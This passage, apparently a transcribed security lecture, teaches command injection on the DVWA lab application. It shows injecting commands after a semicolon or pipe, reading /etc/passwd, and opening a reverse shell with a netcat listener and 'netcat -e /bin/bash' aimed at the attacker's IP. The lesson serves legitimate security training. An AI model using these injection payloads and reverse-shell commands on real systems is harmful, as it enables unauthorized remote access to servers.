command injection attacks. So let's understand it practically first. When we are considering the input functionality, we should know what all things that the input field is going to accept and how it is processing. For example, all of you head towards the DVWA application, and this time make sure you set it to low and select command injection. Select command injection. The functionality of this is it is asking for IP address. If we submit IP address, it performs ping. Let's see. 192.168.1. Let's say 80, which is my metasploitable to IP address. Perfect. What it did, it actually conducted ping for 4 times and displayed the result of that ping on the page. But do note that this particular application is asking for IP address. But what if I give a domain name? Will it work? Let's test. I'm going to give google.com. It is working even if I give Google IP address when Google domain name. The application is asking for IP address, but I gave domain name, but still it is accepting. What does it mean? It is not properly sanitizing the user input. So major portion of the web application attacks are all because of bad user input, authentication, and authorization issues. These are the 3 most common things. So you take any of the attack, it is majorly because of these particular aspects. Now, if it can run commands, what if I give some other commands? For example, if I give pwd, let's provide who am I. So only when you give an IP address and domain name, it is actually working. So can you predict what will be the command that it is executing in the background? So no doubt it is running ping, but we are seeing the ping responses for 4 times. Means it actually executed ping like this. How? So the moment you give that result, give the IP address, it is actually substituting that IP address as part of this command, like ping -c 4 times 192.168.1. So this is the hard-coded command as part of that application code, and whatever thing that you give here, it is going to append that and run it. So this is the same exact result that we are seeing on that screen. So when I give google.com, it is just replacing that IP address with google.com. But when I give pwd, what is it doing? It displayed an error saying that name resolution issue. So pwd, it tried considering this as a domain, but it is not a domain, so it failed. Same, if I do this with who am I, there also it fails. When there is an error like this, it is not going to display that on this page. But there is a trick. You all know we can run multiple commands as part of the command line, right? So when we are running it with IP address, we can combine it with and operator or semicolon operator or pipe and run other commands also. For example, let me put a semicolon and run ID command. Now what happens? It will run the ping followed by ID command. Are you seeing? We got the ID result. Not only that, I can run ifconfig. So after ping, we can see ifconfig result also. So when I am running pwd, I am not able to see the result. But what if I give IP address semicolon pwd? All of you try this. Give some valid IP address or domain name semicolon pwd. As you can notice, the pwd result is also displayed. Okay, instead of using semicolon, we can also use pipe. So if I put pipe and run this command, we are able to see only pwd result. So what is the purpose of pipe? Pipe will take the output of the first command and pass it as an input for the second command. Of course, the ping result is not required for ID command or pwd command. So it is not doing anything. Not only that, what if I give nothing as part of IP address thing? Just semicolon and ifconfig. As you can see, ifconfig result displayed. There is an error, but the application will not display any errors. So let's see. Semicolon ID. There we go. We are able to get the ID result. So all of you try this. Semicolon WAMI. Clicking on submit. You can see it displayed ORB. We can make this vulnerability to execute different commands. Interestingly, we can use semicolon or pipe and start reading the etc passwd file contents, because we can actually know how many users are there on the target machine. So 2 users, general users, Muggle and Harry are the 2 users part of the target application. So we can simply take advantage of this application to understand the user details. The vulnerability is called as command injection vulnerability. You can inject commands to the input field. Again, what is the first point? Triggering point. Where is the triggering point? Triggering point is the input field here. And what is the actual functionality here? Actual functionality is to run ping, right? So we actually use that input field to trigger the command injection vulnerability. Of course, we no need to stop here. We can upgrade this to the next level. So the third thing that I wanted to mention is how damaging. So right now we are actually seeing command execution capability, right? But you can actually upgrade this to a reverse shell also. Before understanding that, please note down the very first point that you see on the slide. Command injection vulnerability in a web application allows attackers to inject untrusted data and execute it as part of the regular command or query. Now let's see on how we can abuse this command injection to get a reverse shell. If you notice, even in the command injection, the actual root cause is bad input sanitization. The given user input is not properly understood by the application. If we are asking user to provide IP address, you need to properly check whether they are providing IP address or not. Anything additional or any kind of special characters should not be allowed. So we need to read the input, and if there are any special characters, we need to ignore them or pre-process them before you start executing it. So when we are looking at the results of this command injection, so who is actually executing all these commands? Remember, when we give IP address, the application, the web application is not executing it. It is actually considered as part of a command line execution on that server itself. Means when you give IP address, it is taken by this HSVBox1 and it will execute that ping command on the terminal, and the result is passed back to the application and it displays the result here. Now let's take help of basic Netcat utility for getting a reverse shell. But before getting a reverse shell, let's understand how this reverse shell thing works. So all of you open your terminal on the attacker device and start Netcat listener. How to start a Netcat listener? Netcat with -L means listen. Verbose P means port number. Let's start listening on port number 1234. We started listening on port 1234. Now let's open one more terminal, and I'm going to keep these two things side by side. The listener is actually listening. Now, what is the purpose of Netcat listener? Netcat listener actually opened a port on our mission, and it is listening on port 1234. Now, whoever connects to this particular port, there will be a connection request that is coming in, right? So how to connect to a port that is already open using Netcat? We can do that with Netcat, IP address and a port number. You remember the same thing that we did on Metasploitable 2152. So I'm going to use Netcat with IP address. We can type our parent machine's IP address or Kali Linux IP address or loopback IP address also, means connecting to the same machine, which is 127.0.0.1 and the port as 1234. There we go. When I run this command, you can notice that there is a connection request that is accepted by my loopback port 1234. Now, this is how you can use Netcat to start a listener and also connect to a port. So we started a listener and we connected to a port. Now let's say after establishing the connection, if I start sending some kind of message like hello, you will actually notice that message on this listener side. If I type a message there, that will be displayed here. This is kind of a chat engine. So we established the connection and we are simply exchanging messages, right? So if I type a message here, you can see that on that listener side. And if you do something here, that message can be exchanged here. This is kind of a chat engine. In fact, when your friend is on the same local network, you can actually start a listener on your computer like this and ask your friend to connect to your computer and you can start chatting. You don't need WhatsApp or anything else. If both the devices are part of the same network in this local area, and if they are Linux machines, Netcat is by default available, so you can actually use it as a chat engine like this. Got it? So starting a Netcat listener and then using the connection command to connect to that listener. But here we are using it for chatting purpose, right? Let's do it slightly different. Let's make a slight modification here. So what is that modification? Let's break this. Let's break this. This time, again, start the Netcat listener. Start the Netcat listener and use Netcat with -e option. -e can allow you to execute commands. So I'm going to pass bin bash utility. I'm going to pass bin bash utility followed by the IP address and the port number, same as before. I'm going to use loopback IP address. Remember, in this case, I'm using loopback means I'm connecting to the same exact mission. If I want to connect to a different mission, then I need to use that target mission's IP address where the listener is running. If I run this command, again, we can notice that there is a connection established when done. But this time, you know what? We have a shell. You can run commands. Where are these commands working? It is on the parent device itself. So what we did? We started a listener and we are actually using a connection command to deliver the shell from this mission onto this listener. And we are able to execute all different commands. Why can't we do the same exact thing on the target web application? We can. For example, I'm going to start a listener on my device, means attacker mission. And I'll be running this particular command on the remote mission, means the web server. Of course, we cannot run this command on the web application. But if the application is vulnerable for command injection, we can run this particular command to obtain that reverse connection, right? So let's try the same and see if we can get a reverse shell from the target application or not. So all of you start doing it along with me. I'm going to start the Netcat listener on the attacker device, the same port 1234. Now open browser and visit the DVWA application. Log in as admin and choose command injection. And this is the point which is vulnerable for that command injection. What we learned before, we can actually add a semicolon or pipe and run any command, right? So if I add a semicolon and run the netcat command, we should be able to get a shell. But in this case, as we are executing the netcat command on web application means the command will be executed on the web server. The server will connect to the attacker mission, right? So we don't have shell on the remote mission. You can imagine that this particular input field as a shell. So I'm going to run netcat with -e/bin/bash. And we are going to specify the attacker's IP address where the listener is running. So let me check the IP address of my attacker device. It is 1.77. So I'm going to add 192.168.1.77 with port number as 1234. Clicking on submit, there we go. Same thing that we did on our device previously, but we did it on a loopback IP address, means connecting to my own web device. But here we are trying to connect to the attacker mission from the vulnerable web application. So we received connection From where? We received connection this time from the web server. I can start executing commands, right, on the web server from my terminal now, right? So it is netcat with -e and all, but we should put a semicolon here. Now, if I run host name command, we should see what is the host name. The device is running slow. So there is no limitation on how much duration, but the moment you close that application, you will lose the connection. So if I close this browser or close this terminal, then we'll lose the connection. Terminal and run netcat -lvp1234. Started listening. And on the browser, where the command injection vulnerability exists, what I'm going to do, netcat -e/bin/bash, IP address of attacker where the listener is listening. Now what happens? This command will be executed by HSVbox1. Now the HSVbox1 will take the shell and give it to the attacker device. Clicking on submit, you can see a connection appear. Now I can run commands like host name. You can see the name of that particular host. Who am I? We gained access as www data, ifconfig, same as what we did before. Now we got shell from the remote server. This is all about the reverse connection that you can obtain. Command injection vulnerability is very dangerous because you no need to make your target do something. So we are just abusing the command execution functionality on that application and executing commands on the server directly. So note down these two commands in your notes. So the first command is we need to start netcat listener. Start netcat listener on attacker device using netcat -lvp and some port number. Again, this is syntax. You need to write some port number there, not port. Next, execute the following command on vulnerable web application. What command is that? Netcat -e/bin/bash with attacker's IP where the listener is listening and the same port that we have used as part of list. So this is how we can make use of command injection to obtain a reverse shell. There are certain vulnerabilities that you can actually take it to this critical level or serious level like this. So when compared with XSS, command injection is vulnerable because of this reverse connection and more control that you can have on the target. But using XSS, it is not possible for us every time to go and take advantage of remotely operating that computer. But using XSS, we can steal sensitive information. Of course, the sensitive information, if it is kind of usernames, passwords, or cookie values, and if the application is vulnerable for some other thing, then we can use that to gain access to that user account and so on. But we should understand which vulnerability can be really interesting and which thing can be taken towards the advanced levels. So this is how we can execute and obtain a reverse connection. In fact, on HSVbox1, I didn't told you the